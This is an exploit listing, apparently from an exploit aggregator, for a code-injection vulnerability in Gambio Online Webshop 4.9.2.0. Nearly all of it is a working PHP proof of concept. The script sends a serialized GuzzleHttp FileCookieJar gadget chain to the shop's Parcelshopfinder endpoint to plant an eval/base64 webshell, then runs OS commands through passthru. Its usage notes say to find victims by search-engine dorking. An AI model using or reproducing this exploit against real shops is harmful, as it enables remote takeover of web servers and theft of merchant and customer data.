Exploit for Gambio Online Webshop 4.9.2.0 Code Injection

Name: Exploit for Gambio Online Webshop 4.9.2.0 Code Injection
Rating: 5 (155 reviews)
2024-10-07 | CVSS 7.4
## https://sploitus.com/exploit?id=PACKETSTORM:182017
=============================================================================================================================================  
| # Title : Gambio Online Webshop 4.9.2.0 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.gambio.com/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 85 set your target .  
  
[+] save code as poc.php .  
  
[+] USage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
<?php  
class GambioExploit {  
private $targetUrl;  
private $webshellName;  
private $postParam;  
private $getParam;  
private $phpCmdFunction;  
  
public function __construct($targetUrl, $phpCmdFunction = 'passthru', $webshellName = null) {  
$this->targetUrl = $targetUrl;  
$this->phpCmdFunction = $phpCmdFunction;  
$this->webshellName = $webshellName ?: $this->randomString() . '.php';  
$this->postParam = $this->randomString();  
$this->getParam = $this->randomString();  
}  
  
// Random string generator  
private function randomString($length = 8) {  
return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);  
}  
  
// Function to send HTTP POST request  
private function sendPostRequest($uri, $data) {  
$url = $this->targetUrl . $uri;  
$options = [  
'http' => [  
'header' => "Content-type: application/x-www-form-urlencoded\r\n",  
'method' => 'POST',  
'content' => http_build_query($data),  
],  
];  
$context = stream_context_create($options);  
return file_get_contents($url, false, $context);  
}  
  
// Upload webshell to target  
public function uploadWebshell() {  
$phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";  
  
$finalPayload = base64_encode(serialize([  
"GuzzleHttp\\Cookie\\FileCookieJar" => [  
"cookies" => [  
"GuzzleHttp\\Cookie\\SetCookie" => [  
"data" => [  
"Value" => $phpPayload,  
"Domain" => "target.com",  
"Path" => "/",  
]  
]  
],  
"filename" => $this->webshellName  
]  
]));  
  
$this->sendPostRequest('/shop.php?do=Parcelshopfinder/AddAddressBookEntry', [  
'checkout_started' => 0,  
'search' => $finalPayload,  
'firstname' => 'test',  
'lastname' => 'test',  
]);  
  
echo "Webshell uploaded to: {$this->webshellName}\n";  
}  
  
// Execute PHP payload  
public function executePhp($cmd) {  
$payload = base64_encode($cmd);  
$this->sendPostRequest("/{$this->webshellName}", [  
$this->postParam => $payload  
]);  
echo "Executed command via webshell: {$cmd}\n";  
}  
  
// Execute command  
public function executeCommand($cmd) {  
$payload = base64_encode($cmd);  
$this->sendPostRequest("/{$this->webshellName}?{$this->getParam}={$this->phpCmdFunction}", [  
$this->postParam => $payload  
]);  
echo "Executed command: {$cmd}\n";  
}  
}  
  
// Example Usage  
$exploit = new GambioExploit('https://target.com');  
$exploit->uploadWebshell();  
$exploit->executeCommand('id');  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================